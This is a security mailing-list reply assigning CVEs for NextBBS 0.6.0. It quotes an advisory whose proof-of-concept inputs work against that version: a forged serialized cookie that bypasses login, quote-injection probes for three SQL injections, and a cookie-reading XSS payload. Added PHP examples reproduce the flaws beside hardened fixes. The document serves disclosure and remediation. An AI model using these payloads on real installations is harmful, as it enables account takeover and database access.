Date: Thu, 29 Mar 2012 19:34:57 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: Henri Salo <henri@...v.fi>, come2waraxe@...oo.com
Subject: Re: CVE-request: NextBBS 0.6.0 waraxe-2012-SA#080

On 03/28/2012 11:34 PM, Henri Salo wrote:
> Can I get three 2012 CVEs for NextBBS issues in 0.6.0, thanks.
> 
> 1. user.php Cookie Parsing Authentication Bypass http://osvdb.org/show/osvdb/80626

Please use CVE-2012-1602 for this issue.

> 2. ajaxserver.php Multiple Function SQL Injection http://osvdb.org/show/osvdb/80637 (findUsers/isIdAvailable/getGreetings)

Please use CVE-2012-1603 for these SQL injection issues.

> 3. index.php do Parameter XSS http://osvdb.org/show/osvdb/80627

Please use CVE-2012-1604 for this issue.

This makes me sooo happy =) Not just a perfect CVE request but the
split/merge of the CVEs is also correct (e.g. 3 SQL injection vulns in
the same bit of code generally = merge =).

> http://packetstormsecurity.org/files/111250/NextBBS-0.6.0-Authentication-Bypass-SQL-Injection-XSS.html
> http://www.waraxe.us/advisory-80.html
> 
> Quoting the advisory http://seclists.org/bugtraq/2012/Mar/134
> """
> [waraxe-2012-SA#080] - Multiple Vulnerabilities in NextBBS 0.6.0
> ===============================================================================
> 
> Author: Janek Vind "waraxe"
> Date: 27. March 2012
> Location: Estonia, Tartu
> Web: http://www.waraxe.us/advisory-80.html
> 
> 
> Description of vulnerable software:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> nextBBS lets you create your own Community with unrivaled ease of use.
> Even though the software is highly performant, it doesn't lack any feature
> that makes big boards attractive. In fact, it offers the most "Web 2.0"
> experience currently available. 
> 
> http://sourceforge.net/projects/forums/
> 
> Vulnerable versions
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> Affected is NextBBS version 0.6.0, older versions may be vulnerable
> as well.
> 
> ###############################################################################
> 1. Authentication Bypass in "user.php"
> ###############################################################################
> 
> Reason: using unsanitized user submitted data
> Attack vector: user submitted cookie
> Preconditions: none
> Result: attacker can impersonate any user, including admins
> 
> Source code snippet from vulnerable script "user.php":
> -----------------[ source code start ]---------------------------------
> // Cookie?
> if(isset($_COOKIE[$CONFIG->sessions->name]) || isset($_SESSION[$CONFIG->sessions->name]))
> {
> ..
>         if(isset($_COOKIE[$CONFIG->sessions->name]))
>         {
>                 $scookie = $_COOKIE[$CONFIG->sessions->name];
> ..
>                 $cookie = unserialize(stripslashes($scookie));
> ..
>                 $checkagainst = $this->generatePrivateKey($row['password']);
>                 if($checkagainst == $cookie['userkey'])
>                 {
>                         $_SESSION['ID'] = $uid;
>                         $this->setMember($_SESSION['ID']);
> -----------------[ source code end ]-----------------------------------
> 
> As seen above, user submitted cookie will be unserialized and resulting
> data is used for authentication. No input data validation exists.
> Attacker can use specially crafted cookie, so that after unserializing
> variable "$cookie['userkey']" will be boolean "true".
> Comparing as "if($checkagainst == $cookie['userkey'])" is insecure and will
> always return "true", if "$cookie['userkey']" is boolean "true".
> This will allow complete authentication bypass.
> 
> Test:
> 
> Array after serialization:
> a:3:{s:3:"uid";s:4:"1219";s:7:"checker";s:1:"1";s:7:"userkey";b:1;}
> After urlencoding:
> a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D
> Cookie:
> nextBBS=a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D;
> 
> 
> Now we will use Firefox with "Tamper Data" extension for easy cookie manipulation.
> Let's open page in unauthenticated state and with crafted cookie:
> 
> http://localhost/nextbbs.0.6.0/
> 
> Result: "Welcome back, waraxe. (Log out?) (Admin CP)"
> 
> We have admin level access now, as expected.
> 
> ###############################################################################
> 2. SQL Injection in "ajaxserver.php" function "findUsers"
> ###############################################################################
> 
> Reason: using unsanitized user submitted data in SQL queries
> Attack vector: user submitted GET parameter "curstr"
> Preconditions: none
> Result: attacker can manipulate database queries
> 
> Source code snippet from vulnerable script "ajaxserver.php":
> -----------------[ source code start ]---------------------------------
> function findUsers($method)
> {
>         global $INPUT, $CONFIG, $DB;
>         
>         $filter = urldecode($INPUT['curstr']);
>         $retstr = '';
>         $qry = "SELECT userid FROM {$CONFIG->dbprfx}users 
>                 WHERE server='{$CONFIG->server}' AND userid like '".$filter."%'";
>         $res = $DB->query($qry);
> -----------------[ source code end ]-----------------------------------
> 
> As seen above, user submitted GET parameter "curstr" is urldecoded and
> afterwards used in SQL query without proper sanitization. By using urlencoded
> single quotes it is possible to conduct SQL injection attacks.
> 
> Test:
> 
> http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe
> 
> Result:
> 
> SQL Layer Error: You have an error in your SQL syntax; check the manual
> that corresponds to your MySQL server version for the right syntax to use
> near 'axe%'' at line 1
> Query [SELECT userid FROM bb_users WHERE server='1' AND userid like 'war'axe%']
> 
> 
> ###############################################################################
> 3. SQL Injection in "ajaxserver.php" function "isIdAvailable"
> ###############################################################################
> 
> Reason: using unsanitized user submitted data in SQL queries
> Attack vector: user submitted GET parameter "id"
> Preconditions: none
> Result: attacker can manipulate database queries
> 
> Source code snippet from vulnerable script "ajaxserver.php":
> -----------------[ source code start ]---------------------------------
> function isIdAvailable($method)
> {
>         global $INPUT, $CONFIG, $DB;
> 
>         $filter = urldecode($INPUT['id']);
>         $qry = "SELECT COUNT(*) as c FROM {$CONFIG->dbprfx}users
>                 WHERE server='{$CONFIG->server}' AND userid ='".$filter."'";
>         $res = $DB->query($qry);
> -----------------[ source code end ]-----------------------------------
> 
> As seen above, user submitted GET parameter "id" is urldecoded and
> afterwards used in SQL query without proper sanitization. By using urlencoded
> single quotes it is possible to conduct SQL injection attacks.
> 
> Test:
> 
> http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=isidavailable&id=war%2527axe
> 
> Result:
> 
> SQL Layer Error: You have an error in your SQL syntax; check the manual
> that corresponds to your MySQL server version for the right syntax to use
> near 'axe'' at line 1
> Query [SELECT COUNT(*) as c FROM bb_users WHERE server='1' AND userid ='war'axe']
> 
> 
> ###############################################################################
> 4. SQL Injection in "ajaxserver.php" function "getGreetings"
> ###############################################################################
> 
> Reason: using unsanitized user submitted data in SQL queries
> Attack vector: user submitted GET parameter "username"
> Preconditions: none
> Result: attacker can manipulate database queries
> 
> Source code snippet from vulnerable script "ajaxserver.php":
> -----------------[ source code start ]---------------------------------
> function getGreetings($method)
> {
>         global $INPUT, $CONFIG, $DB;
>         
>         $username = urldecode($INPUT['username']);
>         $qry = "SELECT text FROM {$CONFIG->dbprfx}greetings g JOIN
>                 {$CONFIG->dbprfx}users u ON (g.dest_id=u.user_ID)
>                 WHERE g.server='{$CONFIG->server}' AND 
>                 u.userid='{$username}' AND g.folder_id='1'";
>         $res = $DB->query($qry);
> -----------------[ source code end ]-----------------------------------
> 
> As seen above, user submitted GET parameter "username" is urldecoded and
> afterwards used in SQL query without proper sanitization. By using urlencoded
> single quotes it is possible to conduct SQL injection attacks.
> 
> Test:
> 
> http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=getgreetings&username=war%2527axe
> 
> Result:
> 
> SQL Layer Error: You have an error in your SQL syntax; check the manual
> that corresponds to your MySQL server version for the right syntax to use
> near 'axe' AND g.folder_id='1'' at line 1
> Query [SELECT text FROM bb_greetings g JOIN bb_users u ON (g.dest_id=u.user_ID)
>  WHERE g.server='1' AND u.userid='war'axe' AND g.folder_id='1']
> 
> 
> ###############################################################################
> 5. Reflected XSS in anti-hack measures
> ###############################################################################
> 
> Reason: using unsanitized user submitted data in outputted html
> Attack vector: user submitted URI
> Remarks: XSS payload max length is limited
> 
> Test:
> 
> http://localhost/nextbbs.0.6.0/index.php?do=<body+onload=alert(document.cookie);>
> 
> Response page shows warning:
> 
> "Note: A hack attempt was detected.
> It is being logged and reported to the admin along with your IP address:"
> 
> At the same time XSS payload execution can be observed.
> 
> 
> Contact:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> come2waraxe () yahoo com
> Janek Vind "waraxe"
> """
> 
> - Henri Salo


-- 
Kurt Seifried Red Hat Security Response Team (SRT)
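The cookie check in item 1 of the quoted advisory, reduced to a runnable PHP script as an added example (this is not NextBBS code). The advisory does not show generatePrivateKey(), so userKeyFor() below is an assumed stand-in and the password hash it is fed is constructed; the cookie field names and the serialized payload are the advisory's own. The hardened variant swaps unserialize() for json_decode() and the loose `==` for a type check plus hash_equals():

```php
<?php
// Added example (not NextBBS code): why the user.php cookie check fails,
// and a hardened replacement. userKeyFor() and the sample password hash
// are assumptions for illustration.

// --- The vulnerable pattern, reduced to its essentials ---------------------
function vulnerableCheck(string $rawCookie, string $checkagainst): bool
{
    // user.php does: $cookie = unserialize(stripslashes($scookie));
    // so the attacker chooses not only the values but their PHP types.
    $cookie = @unserialize($rawCookie);
    if (!is_array($cookie) || !array_key_exists('userkey', $cookie)) {
        return false;
    }
    // Loose comparison: any non-empty string == true is true, so a serialized
    // boolean (b:1;) matches every user's key without knowing it.
    return $checkagainst == $cookie['userkey'];
}

// --- Hardened check ----------------------------------------------------------
function hardenedCheck(string $rawCookie, string $checkagainst): bool
{
    // Never unserialize() untrusted input: it can instantiate arbitrary
    // classes. A flat JSON object carries the same fields without that risk.
    $cookie = json_decode($rawCookie, true);
    if (!is_array($cookie) || !isset($cookie['userkey']) || !is_string($cookie['userkey'])) {
        return false;   // a boolean, integer or missing key can never pass
    }
    // Strict, constant-time string comparison.
    return hash_equals($checkagainst, $cookie['userkey']);
}

// Assumed stand-in for generatePrivateKey($row['password']); the real
// derivation in NextBBS is not shown in the advisory.
function userKeyFor(string $passwordHash): string
{
    return hash('sha256', 'nextbbs-userkey|' . $passwordHash);
}

$checkagainst = userKeyFor('5f4dcc3b5aa765d61d8327deb882cf99'); // constructed hash

// The advisory's payload: "userkey" is the serialized boolean true (b:1;).
$forged = 'a:3:{s:3:"uid";s:4:"1219";s:7:"checker";s:1:"1";s:7:"userkey";b:1;}';
var_dump(vulnerableCheck($forged, $checkagainst));   // bool(true): bypass

// The same forgery against the hardened check, expressed as JSON.
var_dump(hardenedCheck('{"uid":"1219","checker":"1","userkey":true}', $checkagainst)); // bool(false)

// A legitimate cookie still authenticates.
$legit = json_encode(['uid' => '1219', 'checker' => '1', 'userkey' => $checkagainst]);
var_dump(hardenedCheck($legit, $checkagainst));       // bool(true)
```

hash_equals() arrived in PHP 5.6, after this advisory; on older releases `is_string()` followed by `===` closes the type-juggling hole (though not the timing side channel). The larger design fix is to stop deriving a reusable key from the password hash at all and keep only a random, server-side session identifier in the cookie, so that nothing a client can forge is compared against a secret.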

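Items 2, 3 and 4 of the quoted advisory are one pattern: a GET parameter is urldecode()d a second time and concatenated into a query. The added example below (not NextBBS code) shows findUsers() in that shape next to a parameterized version, with isIdAvailable() fixed the same way; getGreetings() needs nothing different. An in-memory SQLite database stands in for MySQL, the table and column names follow the queries printed in the advisory, and the rows are constructed:

```php
<?php
// Added example (not NextBBS code): the ajaxserver.php query pattern beside a
// parameterized version. SQLite in memory stands in for MySQL; rows are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE bb_users (user_ID INTEGER PRIMARY KEY, server TEXT, userid TEXT)');
$db->exec("INSERT INTO bb_users (server, userid) VALUES ('1','waraxe'), ('1','war_axe'), ('1','admin')");
$server = '1';

// Vulnerable: string concatenation, as in findUsers().
function findUsersVulnerable(PDO $db, string $server, string $curstr): array
{
    $filter = urldecode($curstr);   // second decode: %2527 -> %27 -> '
    $qry = "SELECT userid FROM bb_users WHERE server='{$server}' AND userid like '" . $filter . "%'";
    return $db->query($qry)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: a bound parameter can never change the shape of the statement.
// LIKE metacharacters in the user's prefix are escaped too, so "war_" matches literally.
function findUsersSafe(PDO $db, string $server, string $curstr): array
{
    $filter  = urldecode($curstr);  // kept only to mirror the original data flow
    $escaped = str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $filter);
    $stmt = $db->prepare("SELECT userid FROM bb_users WHERE server = ? AND userid LIKE ? ESCAPE '\\'");
    $stmt->execute([$server, $escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// isIdAvailable() with the same fix (getGreetings() is identical in kind).
function isIdAvailableSafe(PDO $db, string $server, string $id): bool
{
    $stmt = $db->prepare('SELECT COUNT(*) FROM bb_users WHERE server = ? AND userid = ?');
    $stmt->execute([$server, urldecode($id)]);
    return (int) $stmt->fetchColumn() === 0;
}

// The advisory's probe, as it sits in $_GET after the web server's own decoding.
try {
    findUsersVulnerable($db, $server, 'war%27axe');
} catch (PDOException $e) {
    echo "vulnerable: ", $e->getMessage(), "\n";   // syntax error near "axe", as in the advisory
}

// A tautology with a trailing comment dumps every user from the vulnerable query...
print_r(findUsersVulnerable($db, $server, '%27 OR 1=1 -- '));   // waraxe, war_axe, admin
// ...and nothing from the safe one: no userid starts with "' OR 1=1 -- ".
print_r(findUsersSafe($db, $server, '%27 OR 1=1 -- '));         // empty
print_r(findUsersSafe($db, $server, 'war_'));                    // war_axe only
var_dump(isIdAvailableSafe($db, $server, 'admin'));              // bool(false)
```

The advisory's use of %2527 rather than %27 suggests that the input layer neutralises a literal quote and that the extra urldecode() reintroduces it; removing that decode would only restore the filter, while the bound parameter makes the filter irrelevant. On MySQL the backslash is already the default LIKE escape character, so the ESCAPE clause can be dropped there; it is spelled out above because SQLite has no default.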
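Item 5 of the quoted advisory is a notice that echoes an unknown "do" value back into the page. The added example below (not NextBBS code) dispatches "do" against an allow-list and encodes whatever it reflects; the handler names and the exact wording of the notice are assumptions, since the advisory shows only the first two lines of the message:

```php
<?php
// Added example (not NextBBS code): a dispatcher for the "do" parameter that
// never reflects the raw value. KNOWN_ACTIONS and the notice text are assumed.

const KNOWN_ACTIONS = ['ajaxserver', 'viewforum', 'viewthread', 'login'];

// Returns the HTML fragment index.php would emit for this request.
function dispatch(array $get): string
{
    $do = (isset($get['do']) && is_string($get['do'])) ? $get['do'] : '';

    // Allow-list first: only known action names reach a handler at all.
    if (in_array($do, KNOWN_ACTIONS, true)) {
        return '<!-- handler ' . $do . ' runs here -->';
    }

    // Unknown action. The original page put the value back into HTML as-is;
    // encode it for the HTML body context, with ENT_QUOTES so the same value is
    // also safe inside an attribute, and ENT_SUBSTITUTE so a cut-off UTF-8
    // sequence becomes U+FFFD instead of an empty string.
    $shown = htmlspecialchars(substr($do, 0, 64), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // Log the raw value hex-encoded so a payload cannot inject into the log
    // line or into a viewer that renders log files as HTML.
    error_log('unknown action from ' . ($_SERVER['REMOTE_ADDR'] ?? 'cli') . ': ' . bin2hex($do));

    return '<p>Note: A hack attempt was detected. It is being logged. Action: ' . $shown . '</p>';
}

// The advisory's payload, as it arrives in $_GET after URL decoding.
echo dispatch(['do' => '<body onload=alert(document.cookie);>']), "\n";
// -> the angle brackets come out as &lt; and &gt;: text, not markup

echo dispatch(['do' => 'viewforum']), "\n";   // known action, no notice
```

The payload's document.cookie is also the reason to set the session cookie HttpOnly (session.cookie_httponly, or the httponly argument of setcookie()): encoding fixes this bug, HttpOnly limits what any XSS that remains can steal.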